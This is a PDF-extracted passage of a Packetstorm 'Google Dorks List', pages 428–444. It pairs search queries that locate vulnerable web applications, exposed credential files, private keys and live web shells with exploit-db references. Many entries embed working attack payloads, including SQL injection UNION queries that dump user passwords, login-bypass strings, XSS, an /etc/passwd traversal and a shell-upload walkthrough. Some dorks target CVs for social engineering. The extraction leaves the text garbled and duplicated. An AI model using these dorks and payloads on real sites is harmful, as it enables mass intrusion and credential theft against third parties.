TRUC 0.11.0 :: TRUC 0.11.0 :: 2006 by ASDIS : RUC 0.11.0 (download.php) Remote

Page 428: Packetstorm Google Dorks List

2006 by ASDIS : File Disclosure Vulnerability - CVE:2008-0814: http://www.exploit-db.com/exploits/5129

2005 Ocean12Technologies. Allrights reserved

2005 Ocean12 Technologies. Allrights reserved

Ocean12 Membership Manager ProDatabase Disclosure Vulnerability:http://www.exploit-db.com/exploits/7245

" 2004PHPKick.deVersion 0.8"

" 2004 PHPKick.de Version 0.8"

PHPKick v0.8 statistics.php SQLInjection - CVE: 2010-3029:http://www.exploit-db.com/exploits/14578

" 2009 AzimutTechnologie" " 2009 Azimut Technologie"

Azimut Technologie Admin LoginBypass vulnerability:http://www.exploit-db.com/exploits/12695

Copyright 2007BrowserCRM Ltd Copyright 2007 BrowserCRM Ltd

BrowserCRM 5.002.00 (clients.php)Remote File Inclusion Vulnerability -CVE: 2008-2689: http://www.exploit-db.com/exploits/5757

"Powered bynzFotolog v0.4.12005-2006Ricardo Amaral"

"Powered by nzFotolog v0.4.12005-2006 Ricardo Amaral"

nzFotolog 0.4.1 (action_file) Local FileInclusion Vulnerability - CVE: 2008-3405: http://www.exploit-db.com/exploits/6164

"Diseo WebHernestConsulting S.L."

"Diseo Web Hernest ConsultingS.L."

Administrador de Contenidos AdminLogin Bypass vulnerability:http://www.exploit-db.com/exploits/12527

" 2008 DevWorx -devworx.somee.com"

" 2008 DevWorx -devworx.somee.com"

TermiSBloG V 1.0 SQL Injection(s)Vulnerability: http://www.exploit-db.com/exploits/11081

"Gnr par KDPicsv1.18" "Gnr par KDPics v1.18"

Gnr par KDPics v1.18 Remote AddAdmin: http://www.exploit-db.com/exploits/11455

" Sabdrimer CMS" " Sabdrimer CMS"

Sabdrimer PRO 2.2.4 (pluginpath)Remote File Include Vulnerability -CVE: 2006-3520: http://www.exploit-db.com/exploits/1996

Thyme 1. 2006eXtrovert SoftwareLLC. All rightsreserved

Thyme 1. 2006 eXtrovert SoftwareLLC. All rights reserved

Thyme 1.3 (export_to) Local FileInclusion Vulnerability - CVE: 2009-0535: http://www.exploit-db.com/exploits/8029

"Sitedesign by: "Sitedesign by: Dieleman Rave Creations/UHM (artists.asp) SQL

Page 429: Packetstorm Google Dorks List

Dielemanwww.dieleman.nl -Copyright 2010"

www.dieleman.nl - Copyright2010"

Injection Vulnerability:http://www.exploit-db.com/exploits/12701

"Script ralis parBinGo PHP" "Script ralis par BinGo PHP"

BinGo News 3.01 (bnrep) Remote FileInclude Vulnerability - CVE: 2006-4648: http://www.exploit-db.com/exploits/2312

2005-2006Powered byeSyndiCatDirectory Software

2005-2006 Powered by eSyndiCatDirectory Software

eSyndiCat Directory Software MultipleSQL Injection Vulnerabilities - CVE:2007-3811: http://www.exploit-db.com/exploits/4183

PHPGnalogiefonctionne sur unserveur PHP

PHPGnalogie fonctionne sur unserveur PHP

PHPGenealogy 2.0 (DataDirectory)RFI Vulnerability - CVE: 2009-3541:http://www.exploit-db.com/exploits/9155

Actionne parsmartblog Actionne par smartblog

Smartblog (index.php tid) Remote SQLInjection Vulnerability - CVE: 2008-2185: http://www.exploit-db.com/exploits/5535

1998 - 2010 VideoBattle Script 1998 - 2010 Video Battle Script

PHP Video Battle SQL InjectionVulnerability - CVE: 2010-1701:http://www.exploit-db.com/exploits/12444

1998 - 2010 VideoBattle Script 1998 - 2010 Video Battle Script

PHP Video Battle SQL InjectionVulnerability - CVE: 2010-1701:http://www.exploit-db.com/exploits/12444

Copyright 2007 byHorst-D. KrllerCMS: php WCMS

Copyright 2007 by Horst-D. KrllerCMS: php WCMS

php wcms XT 0.0.7 Multiple RemoteFile Inclusion Vulnerabilities - CVE:2007-5185: http://www.exploit-db.com/exploits/4477

Powered byGbook MX v4.1.02003 Magtrb Soft

Powered by Gbook MX v4.1.0 2003Magtrb Soft

Gbook MX v4.1.0 Arabic Version FileInclusion Vulnerability:http://www.exploit-db.com/exploits/10986

Powered bySLAED CMS2005-2008SLAED. All rightsreserved.

Powered by SLAED CMS 2005-2008 SLAED. All rights reserved.

Slaed CMS v4 MultipleVulnerabilities: http://www.exploit-db.com/exploits/11596

Powered byUCenter 1.5.02001 - 2008

Powered by UCenter 1.5.0 2001 -2008 Comsenz Inc.

Ucenter Projekt 2.0 Insecurecrossdomain (XSS) Vulnerability:http://www.exploit-

Page 430: Packetstorm Google Dorks List

Comsenz Inc. db.com/exploits/12455

"Splatt Forum" "Splatt Forum"

PHP-Nuke Module splattforum 4.0RC1 Local File Inclusion - CVE: 2007-1633: http://www.exploit-db.com/exploits/3518

"Galerie 3.2 2004by progressive" "Galerie 3.2 2004 by progressive"

Galerie 3.2 (pic) WBB Lite AddonBlind SQL Injection - CVE: 2008-4516: http://www.exploit-db.com/exploits/6675

"propuls parJBlog" "propuls par JBlog"

JBlog 1.0 Create / Delete AdminAuthentication Bypass - CVE: 2007-3973: http://www.exploit-db.com/exploits/4211

"Powered byBLOG:CMS"|"Powered byblogcms.com"|"2003-2004, RadekHuln"

"Powered byBLOG:CMS"|"Powered byblogcms.com"|"2003-2004, RadekHuln"

BLOG:CMS 4.0.0k Remote SQLInjection - CVE: 2006-3364:http://www.exploit-db.com/exploits/1960

"propuls parDotClear" "filatom" "fil rss"+commentaires

"propuls par DotClear" "fil atom""fil rss" +commentaires

DotClear 1.2.4 (prepend.php) ArbitraryRemote Inclusion - CVE: 2006-2866:http://www.exploit-db.com/exploits/1869

"Site powered byGuppY" | "Site cravec GuppY"+inurl:lng=

"Site powered by GuppY" | "Site cravec GuppY" +inurl:lng=

GuppY 4.5.16 Remote CommandsExecution - CVE: 2007-0639:http://www.exploit-db.com/exploits/3221

php Kolay Forum(php KF) 2007 -2010 phpKF Ekibi

php Kolay Forum (php KF) 2007 -2010 phpKF Ekibi

Submitter: FreWaL CSRFVulnerability: http://www.exploit-db.com/exploits/15685

powered byvBulletin 3.8.6 powered by vBulletin 3.8.6

vBulletin(R) 3.8.6 faq.php InformationDisclosure Vulnerability:http://www.exploit-db.com/exploits/14455

intitle:"owlintranet * owl"0.82

intitle:"owl intranet * owl" 0.82

OWL Intranet Engine 0.82(xrms_file_root) Code Execution -CVE: 2006-1149: http://www.exploit-db.com/exploits/1561

"powered by jaws"| "powered by thejaws project" |inurl:?gadget=search

"powered by jaws" | "powered bythe jaws project" |inurl:?gadget=search

Jaws 0.6.2 (Search gadget) RemoteSQL Injection - CVE: 2006-3292:http://www.exploit-db.com/exploits/1946/

Page 431: Packetstorm Google Dorks List

intitle:EvoCaminurl:webcam.html intitle:EvoCam inurl:webcam.html

This search identifies EvoCam camerasaccessible over the Internet. There arealso public exploits that target thesecameras: http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=evocam&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve= Author: Airloom

||Powered by[ClipBucket2.0.91]

||Powered by [ClipBucket 2.0.91]

This search identifies clpbpucketinstallations. They frequently have anadmin/admin default password on theadministrative backend located at:http://server/admin_area/login.php .Author: Zhran Team

filetype:reg regHKEY_CURRENT_USERSSHHOSTKEYS

filetype:reg regHKEY_CURRENT_USERSSHHOSTKEYS

This search locates privateSSHHostkeys. Author: loganWHD

inurl:-cfgintext:"enablepassword"

inurl:-cfg intext:"enable password"

Google search for Cisco config files(some variants below): inurl:router-confg inurl:-confg intext:enablepassword inurl:-config intext:"enablepassword" inurl:-cfg intext:"enablesecret" inurl:-confg intext:enable secretinurl:-confg intext:"enable secret"Author: fdisk

"Cisco PIXSecurity ApplianceSoftware Version"+ "Serial Number"+ "show ver" -inurl

"Cisco PIX Security ApplianceSoftware Version" + "SerialNumber" + "show ver" -inurl

Google search for Pix AuthorizationKeys Author: fdisk

intitle:index.ofcisco asa -site:cisco.com

intitle:index.of cisco asa -site:cisco.com

Google search for Pix/Asa imagesAuthor: fdisk

intitle:index.of ios-site:cisco.com intitle:index.of ios -site:cisco.com Google search for Cisco IOS images

Author: fdisk"RemoteSupervisorAdapter II"inurl:userlogin_logo.ssi

"Remote Supervisor Adapter II"inurl:userlogin_logo.ssi

IBM e-server's login pages. Author:DigiP

Page 432: Packetstorm Google Dorks List

allintext:"fs-admin.php" allintext:"fs-admin.php"

A foothold using allintext:"fs-admin.php" shows the world readabledirectories of a plug-in that enablesWordpress to be used as a forum.Many of the results of the search alsoshow error logs which give an attackerthe server side paths including thehome directory name. This name isoften also used for the login to ftp andshell access, which exposes the systemto attack. There is also an undisclosedflaw in version 1.3 of the software, asthe author has mentioned in version 1.4as a security fix, but does not tell uswhat it is that was patched. Author:DigiP

inurl:/dana-na/auth/ inurl:/dana-na/auth/ Juniper SSL Author: bugbear

inurl:index.php?pagedb=rss -Vulnerability -inurl

http://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss

CVE: 2007-4007 EDB-ID: 4221 Thisgoogle dork possibly exposes sites withthe Article Directory (index.php page)Remote File Inclusion Vulnerability

inurl:src/login.php inurl:src/login.php Locates SquirrelMail Login PagesAuthor: 0daydevilz

inurl:"sbw2Behoerden.php" inurl:"sbw2Behoerden.php"

German.Authorities.CMS SQLInjection Vulnerability. Bug:/data/sbw2Behoerden.php?sbwtyp=Author: Bloodman

"This web site wasmade withPostNuke"

"This web site was made withPostNuke"

PostNuke 0.763 (PNSV lang) RemoteCode Execution - CVE: 2006-5733:http://www.exploit-db.com/exploits/2707

"Powered byShop-ScriptFREE"

"Powered by Shop-Script FREE"

Shop-Script FREE 2.0 RemoteCommand Execution - CVE: 2007-4932: http://www.exploit-db.com/exploits/4419/

"powered byQuick.Cart" "powered by Quick.Cart"

Quick.Cart 2.0(actions_client/gallery.php) Local FileInclude: http://www.exploit-db.com/exploits/2769

"Powered by PHP-Update" -site:www.php-

"Powered by PHP-Update" -site:www.php-update.co.uk

PHP-Update 2.7 Multiple RemoteVulnerabilities - CVE: 2006-6879:http://www.exploit-

Page 433: Packetstorm Google Dorks List

update.co.uk db.com/exploits/3017intext:"2000-2001The phpHeavenTeam" -sourceforge

intext:"2000-2001 The phpHeavenTeam" -sourceforge

phpMyChat 0.15.0dev (SYS enter)Remote Code Execution:http://www.exploit-db.com/exploits/1647

"Powered byMercuryBoard" "Powered by MercuryBoard"

MercuryBoard 1.1.5 (login.php)Remote Blind SQL Injection - CVE:2008-6632: http://www.exploit-db.com/exploits/5653

"Powered byCoppermine PhotoGallery"

"Powered by Coppermine PhotoGallery"

Coppermine Photo Gallery 1.4.18 LFI /Remote Code Execution - CVE: 2008-3481: http://www.exploit-db.com/exploits/6178

"Content managedby the EtomiteContentManagementSystem"

"Content managed by the EtomiteContent Management System"

Etomite CMS 0.6.1 (username) SQLInjection - CVE: 2006-3904:http://www.exploit-db.com/exploits/2071

"powered byPCPIN.com" "powered by PCPIN.com"

PCPIN Chat 5.0.4 (login/language)Remote Code Execution:http://www.exploit-db.com/exploits/1697

"Powered byLeap" "Powered by Leap"

Leap CMS 0.1.4 (searchterm) BlindSQL Injection - CVE: 2009-1613:http://www.exploit-db.com/exploits/8576

inurl:"option=com_tophotelmodule" inurl:"option=com_tophotelmodule"

CVE: 2009-3368 EDB-ID: This searchpotentially exposes Joomla HotelBooking System XSS/SQL InjectionVulnerabilities

"RuncmsCopyright" "2002- 2007" +"pagecreated"

"Runcms Copyright" "2002 - 2007"+"page created"

RunCms 1.5.2 (debug_show.php)Remote SQL Injection - CVE: 2007-2539: http://www.exploit-db.com/exploits/3850

"Powered byeXV2 Vers" "Powered by eXV2 Vers"

exV2 2.0.4.3 extract() RemoteCommand Execution - CVE: 2006-7080: http://www.exploit-db.com/exploits/2415

"Betrieben mitSerendipity 1.0.3" "Betrieben mit Serendipity 1.0.3"

Serendipity 1.0.3 (comment.php) LocalFile Include - CVE: 2006-6242:http://www.exploit-db.com/exploits/2869

Page 434: Packetstorm Google Dorks List

"Powered byXMB" "Powered by XMB"

XMB 1.9.6 Final basename() RemoteCommand Execution - CVE: 2006-4191: http://www.exploit-db.com/exploits/2178

"Powered byBIGACE 2.5" "Powered by BIGACE 2.5"

BIGACE CMS 2.5 (username) RemoteSQL Injection - CVE: 2009-1778:http://www.exploit-db.com/exploits/8664

allintitle: poweredby DeluxeBB allintitle: powered by DeluxeBB

DeluxeBB 1.2 Multiple RemoteVulnerabilities - CVE: 2008-2195:http://www.exploit-db.com/exploits/5550

"Powered byOnline Grades" "Powered by Online Grades"

Online Grades & Attendance 3.2.6Blind SQL Injection - CVE: 2009-2598: http://www.exploit-db.com/exploits/8854

inurl:imageview5 inurl:imageview5

Imageview 5 (Cookie/index.php)Remote Local Include - CVE: 2006-5554: http://www.exploit-db.com/exploits/2647

"This site ispowered by e107" "This site is powered by e107"

TikiWiki 1.9 Sirius (jhot.php) RemoteCommand Execution - CVE: 2006-4602: http://www.exploit-db.com/exploits/2711

"powered bytikiwiki" "powered by tikiwiki"

TikiWiki 1.9 Sirius (jhot.php) RemoteCommand Execution - CVE: 2006-4602: http://www.exploit-db.com/exploits/2288

intitle:"X7 ChatHelpCenter"|"PoweredBy X7 Chat"

intitle:"X7 Chat HelpCenter"|"Powered By X7 Chat"

X7 Chat 2.0 (help_file) RemoteCommands Execution - CVE: 2006-2156: http://www.exploit-db.com/exploits/1738

"powered bygcards" "powered by gcards"

gCards 1.45 Multiple Vulnerabilities -CVE: 2006-1346: http://www.exploit-db.com/exploits/1595

pixelpost "RSS2.0" "ATOM feed""Valid xHTML /Valid CSS"

pixelpost "RSS 2.0" "ATOM feed""Valid xHTML / Valid CSS"

Pixelpost 1-5rc1-2 Remote PrivilegeEscalation Exploit - CVE: 2006-2889:http://www.exploit-db.com/exploits/1868

"This web site wasmade with MD-Pro"

"This web site was made with MD-Pro"

CVE: 2006-7112 EDB-ID: 2712 Thissearch can potentially identifyvulnerable installations of MD-Pro, aweb portal system written in PHP.

Page 435: Packetstorm Google Dorks List

"Powered byXMB"

http://www.google.com/search?q="Powered+by+XMB"

CVE: 2006-3994 EDB-ID: 2105 Thissearch can potentially identifyvulnerable installations of XMB

"powered byThWboard" "powered by ThWboard"

CVE: 2007-0340 EDB-ID: 3124 Thissearch can potentially identifyvulnerable installations of ThWboard.

"Page created in""seconds byglFusion" +RSS

"Page created in" "seconds byglFusion" +RSS

CVE: 2009-1281 EDB-ID: 8347 Thissearch can potentially identifyvulnerable installations of glFusion.http://www.exploit-db.com/exploits/8347

inurl:wp-login.phpRegister UsernamePassword -echo

inurl:wp-login.php RegisterUsername Password -echo

CVE: 2006-2667 EDB-ID: 6 Thissearch can potentially identifyvulnerable installations of WordPress.

"this site is usingthe webspell script(version: 4.01.02)"

"this site is using the webspell script(version: 4.01.02)"

CVE: 2007-0502 EDB-ID: 3172 Thissearch can potentially identifyvulnerable installations of webSPELL4.01.02

inurl:"jscripts/tiny_mce/plugins/tinybrowser/"

inurl:"jscripts/tiny_mce/plugins/tinybrowser/"

inurl:"jscripts/tiny_mce/plugins/tinybrowser/" or refinedinurl:"jscripts/tiny_mce/plugins/tinybrowser/" "index of" Various"tinybrowser" vulnerabilities:http://www.exploit-db.com/exploits/9296/ DigiP

"Site produced byGeneralProducts.co.uk"

"Site produced byGeneralProducts.co.uk"

GeneralProducts (index.php?page=)Local File Inclusion Vulnerabilityhttp://server/index.php?page=../../../../../../etc/passwd Net.Edit0r [email protected]

inurl:"index.php?option=com_jeajaxeventcalendar"

inurl:"index.php?option=com_jeajaxeventcalendar"

Joomla JE Ajax Event CalendarComponent (com_jeajaxeventcalendar)SQL Injection Vulnerability Author:altbta

filetype: loginurl:"access.log"+intext:"HTTP/1.1"

filetype: log inurl:"access.log"+intext:"HTTP/1.1"

Match some apache access.log files.Author: susmab

inurl:"index.php?option=com_storedirectory"

inurl:"index.php?option=com_storedirectory"

SQL Injection Vulnerability:http://127.0.0.1/index.php?option=com_storedirectory&task=view&id=-16UNION SELECT1,2,concat_ws(0x3a,username,email,pa

Page 436: Packetstorm Google Dorks List

ssword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users Author:Ashiyane Digital Security Team

inurl:"index.php?option=com_annuaire"

inurl:"index.php?option=com_annuaire"

SQL Injection Vulnerability: [+] vuln:http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi] [+] Exploit:/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users-- Submitter: Ashiyane DigitalSecurity Team

inurl:panorama-viewer.php?id= inurl:panorama-viewer.php?id=

[-] http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users-- [-]http://server/adm/users.php [-]http://server/adm/panorama_edit.php?id=1 [-]http://server/listimages/shell.php################################################################# Great 2 : : h4m1d /sheisebaboo /vc.emliter / Neo / H-SK33PY /Net.Editor / HUrr!c4nE / Cair3x /novinsecurity team and all iranian hackers#################################################################

inurl:showcat.asp?id= inurl:showcat.asp?id=

======================================== Centralia(admin/dbedit.asp?) Bypass and ShellUpload Vulnerability========================================################################################################# # Exploit : Centralia(admin/dbedit.asp?) Bypass and FileUpload Vulnerability # Date : 10December 2010 # Author : ali.erroor #Version : n/a # Googel DorK :inurl:showcat.asp?id= # Home :www.network-security.ir # Email :

Page 437: Packetstorm Google Dorks List

[email protected]################################################################# [+] Exploit [1] Centralia(admin/dbedit.asp?) Bypass and FileUpload Vulnerability.. [-]http://localhost/path/admin/dbedit.asp?table=products [-] username : 'or''=' [-]password : 'or''=' [2] Create NewUpload Your Shell.Asp .. [-]http://localhost/path/admin/dbedit.asp?a=upload_init [3] To See Shell EditYour uploads [-]http://localhost/path/uploads/shell;asp.jpg [+] Demo [-]http://server/admin/dbedit.asp?table=products [-]http://server/admin/dbedit.asp?a=upload_init################################################################# Great 2 : : h4m1d /sheisebaboo /vc.emliter / H-SK33PY / Net.Editor /HUrr!c4nE / Cair3x /novin securityteam and all iranian hackers#################################################################

"powered bysimpleview CMS" "powered by simpleview CMS"

Author: Sun Army XSS:/search/?searchString=">alert(document.cookie)&submitSearch.x=17&submitSearch.y=13

intext:Copyright+MantisBT Group

intext: Copyright+MantisBT Group

Mantis Bug Tracker http://mantisbt.orghttp://www.exploit-db.com/exploits/15735http://www.exploit-db.com/exploits/15736 Thanks,* Gjoko'LiquidWorm' Krstic* *InformationSecurity Engineer* ***Zero ScienceLab* Macedonian Information SecurityResearch & Development Laboratoryhttp://www.zeroscience.mk +389 (0)75 290 926 +389 (0) 77 670 886

"Powered by:IRIran.net" "Powered by: IRIran.net" IRIran eShop Builder SQL Injection:

http://server/patch/pages/index.php?id=

Page 438: Packetstorm Google Dorks List

0[SQL] Submitter: Ahoora

allintext:"fs-admin.php" allintext:"fs-admin.php"

A foothold using allintext:"fs-admin.php" shows the world readabledirectories of a plug-in that enablesWordpress to be used as a forum.Many of the results of the search alsoshow error logs which give an attackerthe server side paths including thehome directory name. This name isoften also used for the login to ftp andshell access, which exposes the systemto attack. There is also an undisclosedflaw in version 1.3 of the software, asthe author has mentioned in version 1.4as a security fix, but does not tell uswhat it is that was patched. Author:DigiP

inurl:config/databases.yml -trac -trunk -"GoogleCode" -source -repository

inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

Google search for web site build withsymfony framework. This file containsthe login / password for the databasesAuthor: Simon Leblanc

inurl:web/frontend_dev.php -trunk inurl:web/frontend_dev.php -trunk

Google search for web site build withsymfony framework and indevelopment environment. In mostcase, you have a bar development ontop of the web page. If you go in config-> Settings, you can find login andpassword. if you replaceweb/frontend_dev.php byconfig/databases.yml in url, you canfind login / password for the databasesAuthor: Simon Leblanc

inurl:"/modules.php?name=""Maximus CMS"

inurl:"/modules.php?name=""Maximus CMS"

Maximus CMS (FCKeditor) FileUpload Vulnerabilityhttp://www.exploit-db.com/exploits/15960 Author:eidelweiss

intext:"Poweredby DZOICHandshakesProfessional"

intext:"Powered by DZOICHandshakes Professional"

Author: IR-Security -Team SQLinjection:http://server/administrator/index.php?section=manage_members&action=edit_photo&pho_id=-100001 union allselect 1,version()--

Page 439: Packetstorm Google Dorks List

inurl:"index.php?m=content+c=rss+catid=10"

inurl:"index.php?m=content+c=rss+catid=10"

Author: eidelweisshttp://host/index.php?m=content&c=rss&catid=5 show MySQL Error (table)

site:ebay.cominurl:callback site:ebay.com inurl:callback

Returns:http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=? then:http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3ECan also use:http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOMstring injection to bypass IE8 XSSFilters

inurl:app/etc/local.xml inurl:app/etc/local.xml

Magento local.xml sensitiveinformation disclosure Author:Rambaud Pierre

intitle:cyberanarchy shell intitle:cyber anarchy shell Submitter: eXeSoul cyber anarchy

shellMySQL: ONMSSQL: OFFOracle: OFFMSSQL: OFFPostgreSQL: OFFcURL: ON WGet:ON Fetch: OFFPerl: ON

MySQL: ON MSSQL: OFF Oracle:OFF MSSQL: OFF PostgreSQL:OFF cURL: ON WGet: ON Fetch:OFF Perl: ON

Author :- eXeSoul You will get lots ofweb shells even some private shells.

"POWERED BYZIPBOX MEDIA"inurl:"album.php"

"POWERED BY ZIPBOXMEDIA" inurl:"album.php"

Author : AtT4CKxT3rR0r1ST SQLInjection:www.site.com/album.php?id=null[Sql]

"Powered bySOFTMAN" "Powered by SOFTMAN"

Author: eXeSoul [i] "Powered bySOFTMAN" [ii] "Powered by SoftmanMultitech Pvt Ltd" [iii] "All Rightsreserved by SOFTMAN" Go To AdminPanel :- Admin: ' or 'x'='x Password: 'or 'x'='x

intext:"WebDesign by Webz"filetype:asp

intext:"Web Design by Webz"filetype:asp

Submitter: p0pc0rnhttp://site.com/xxx.asp?id=[SQL]http://site.com/xxx.asp?catID=[SQL]http://site.com/xxx.asp?brandID=[SQL]

ADAN (view.php) Sql Injection

ADAN (view.php ) Sql InjectionVulnerability

SQL Injection: http://www.exploit-db.com/exploits/16276/

Page 440: Packetstorm Google Dorks List

Vulnerabilityintitle:"cascadeserver"inurl:login.act

intitle:"cascade server"inurl:login.act

Search for login screen of defaultinstance: Cascade Server CMS byHannon Author: Erik Horton

intext:"Site byTriwareTechnologies Inc"

intext:"Site by TriwareTechnologies Inc"

Submitter: p0pc0rn SQL Injection:http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id]http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]

intext:"Poweredby OnePlug CMS" intext:"Powered by OnePlug CMS"

Sumitter: p0pc0rn SQL Injection:http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a

intitle:"[EasyPHP]- Administration"

intitle:"[EasyPHP] -Administration"

Unprotected EasyPHP Admin pagedetection.. Author: Aneesh Dogra(lionaneesh)

intext:"Poweredby Inventory MojoSoftware."

intext:"Powered by Inventory MojoSoftware."

Submitter: p0pc0rn SQL Injection(categoria.asp, producto.asp,srubro.asp, marca.asp, buscar.asp,Login.asp, NewUser.asp,do_addToNewsletter.asp) ---http://site.com/categoria.asp?CT=6' and'1'='1 TRUEhttp://site.com/categoria.asp?CT=6' and'1'='0 FALSE

"site byDesignscope" "site by Designscope"

Submitter: Net.Edit0r SQL Injection:http://127.0.0.1/general.php?pageID=[SQL]http://127.0.0.1/content.php?pageID=[SQL]

index.php?option=com_ignitegallery

index.php?option=com_ignitegallery

Submitter: TiGeR_YeMeN HaCkErSQL Injection:index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--

intext:"Poweredby FXRecruiter" intext:"Powered by FXRecruiter"

Submitter: Ashiyane Digital SecurityTeam Arbitrary File Upload: You mustRegister at site, Then in "Upload CVField" Select and Upload Your File,then Using "Live Http Header" Changeur File Format To Etc Uploaded path:http://127.0.0.1/fxmodules/resumes/[Y

Page 441: Packetstorm Google Dorks List

our File]

inurl:"fbconnect_action=myhome" inurl:"fbconnect_action=myhome"

Submitter: z0mbyak SQL Injection:www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

filetype:ini"pdo_mysql"(pass|passwd|password|pwd)

filetype:ini "pdo_mysql"(pass|passwd|password|pwd)

full details dbname dbuser dbpass allplain text Author:Bastich

filetype:ini"SavedPasswords"(pass|passwd|password|pwd)

filetype:ini "SavedPasswords"(pass|passwd|password|pwd)

Unreal Tournament config, plain textpasswords Author: Bastich

filetype:ini"precurio"(pass|passwd|password|pwd)

filetype:ini "precurio"(pass|passwd|password|pwd) plain text passwods

filetype:ini"FtpInBackground"(pass|passwd|password|pwd)

filetype:ini "FtpInBackground"(pass|passwd|password|pwd)

Total commander wxc_ftp.ini run hasthrough John etc. or even better usehttp://wcxftp.org.ru/

filetype:ini"[FFFTP]"(pass|passwd|password|pwd)

filetype:ini "[FFFTP]"(pass|passwd|password|pwd)

Asian FTP software -, run the passwordhash through John etc. Author: Bastich

"error_log"inurl:/wp-content "error_log" inurl:/wp-content

Find various www readable Wordpressdirectories containing error logs withserver side debugging info, such ashome path directory names, which areoften the same user names for logginginto the server over FTP and SSH. Thisoften exposes the path of the plug-insinstalled in wordpress as well, givingsomeone more information andavenues of attack since manyWordpress plug-ins can lead tocompromises of the sites security. -DigiP

allinurl:http://www.google.co.in/lati

allinurl:http://www.google.co.in/latitude/apps/badge/api?user=

Site: google.com/latitude - This is afree application where you can track

Page 442: Packetstorm Google Dorks List

tude/apps/badge/api?user=

your PC, laptop and mobile, just loginthere and you will be trackedfreely(used to track yourself live andyou can put this in blogs to show whereyou are) I made a dork simply thatshows some couple of people, aftersome years when this application willgrow stronger and you can get tons ofvictims.*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=* By *TheALLSTAR*

intitle:Locus7shellintext:"Software:"

intitle:Locus7shellintext:"Software:"

intitle:Locus7shell intext:"Software:"Submitted by lionaneesh -- ThanksAneesh Dogra (lionaneesh)

filetype:xls +password +inurl:.com

filetype:xls + password + inurl:.com

The filetype:xls never changes What isinbtween then + sings can be what everyou are looking for taxid ssn passwordStudent ID etc The inurl: can bechanged to what you want .gov .edu.com etc. Take care, RedShift

"Login Name"RepositoryWebtopintitle:login

"Login Name" Repository Webtopintitle:login

Search for login screen of defaultinstance: Documentum Webtop byEMC

intitle:"EnablingSelf-ServiceProcurement"

intitle:"Enabling Self-ServiceProcurement"

Search for login screen of defaultinstance: Puridiom (A ProcurementWeb Application)

intitle:"cyberrecruiter" "UserID"

intitle:"cyber recruiter" "User ID"Search for login screen of defaultinstance: Cyber Recruiter (applicanttracking and recruiting software)

inurl:sarginurl:siteuser.html inurl:sarg inurl:siteuser.html

Submitter: pipefish Squid User AccessReports that show users' browsinghistory through the proxy. Showsinternal IP space sometimes, usernamesas well, and can be helpful whenplanning a pen test (spearphishing\social engineering campaignetc.) It also helps to ID anorganization's proxy server.

vBulletin InstallPage Detection vBulletin Install Page Detection

inurl:/install/install.phpintitle:vBulletin * Install System Thisdork displays the untreated install.phppages! Auth0r: lionaneesh Greetz to

Page 443: Packetstorm Google Dorks List

:Team Indishell , INDIA , AasimShaikh ,

ionCube LoaderWizardinformationdisclosure

ionCube Loader Wizardinformation disclosure

inurl:loader-wizard ext:php This dorkdisplays sensitive information Auth0r:MaXe

inurl:"clsUploadtest.asp" inurl:"clsUploadtest.asp"

Submitter: KDGCrewhttp://www.site.com/clsUpload/clsUploadtest.asphttp://www.site.com/clsUpload/nameshell.php

filetype:sql"PostgreSQLdatabase dump"(pass|password|passwd|pwd)

filetype:sql "PostgreSQL databasedump" (pass|password|passwd|pwd)

PostgreSQL database dump withpasswords Bastich

filetype:sql"MySQL dump"(pass|password|passwd|pwd)

filetype:sql "MySQL dump"(pass|password|passwd|pwd)

MySQL database dump withpasswords Bastich

filetype:sql"phpmyAdminSQL Dump"(pass|password|passwd|pwd)

filetype:sql "phpmyAdmin SQLDump" (pass|password|passwd|pwd)

phpMyAdmin SQL dump withpasswords Bastich

site:dl.dropbox.com filetype:pdf cvOR curriculumvitae OR resume

site:dl.dropbox.com filetype:pdf cvOR curriculum vitae OR resume

Searches Dropbox for publiclyavaliable PDF's containing informationused in a CV/Resume/CurriculumVitae which can therefore be used in aSocial Engineering based vector attack.Author: Trevor Starick

site:docs.google.com intitle:(cv Orresume ORcurriculum vitae)

site:docs.google.com intitle:(cv Orresume OR curriculum vitae)

Searches GoogleDocs for publiclyavaliable PDF's containing informationused in a CV/Resume/CurriculumVitae which can therefore be used in aSocial Engineering based vector attack.-- Trevor Starick

site:mediafire.comcv Or resume ORcurriculum vitaefiletype:pdf ORdoc

site:mediafire.com cv Or resumeOR curriculum vitae filetype:pdfOR doc

Searches Mediafire for publiclyavaliable PDF's containing informationused in a CV/Resume/CurriculumVitae which can therefore be used in aSocial Engineering based vector attack-- Trevor Starick

Page 444: Packetstorm Google Dorks List

site:stashbox.orgcv Or resume ORcurriculum vitaefiletype:pdf ORdoc

site:stashbox.org cv Or resume ORcurriculum vitae filetype:pdf ORdoc

Searches StashBox for publiclyavaliable PDF's or .doc files containinginformation used in aCV/Resume/Curriculum Vitae whichcan therefore be used in a SocialEngineering based vector attack --Trevor Starick

inurl:/push/ .pemapns -"pushnotifications" "bagattributes"

inurl:/push/ .pem apns -"pushnotifications" "bag attributes"

iphone apple push notification systemprivate keys, frequently unencrypted,frequently with DeviceIDs in same dir

inurl:server-infointitle:"ServerInformation"Apache ServerInformation

inurl:server-info intitle:"ServerInformation" Apache ServerInformation

Juicy information about the apacheserver installation in the website. --*Regards, Fady Mohammed Osman.*
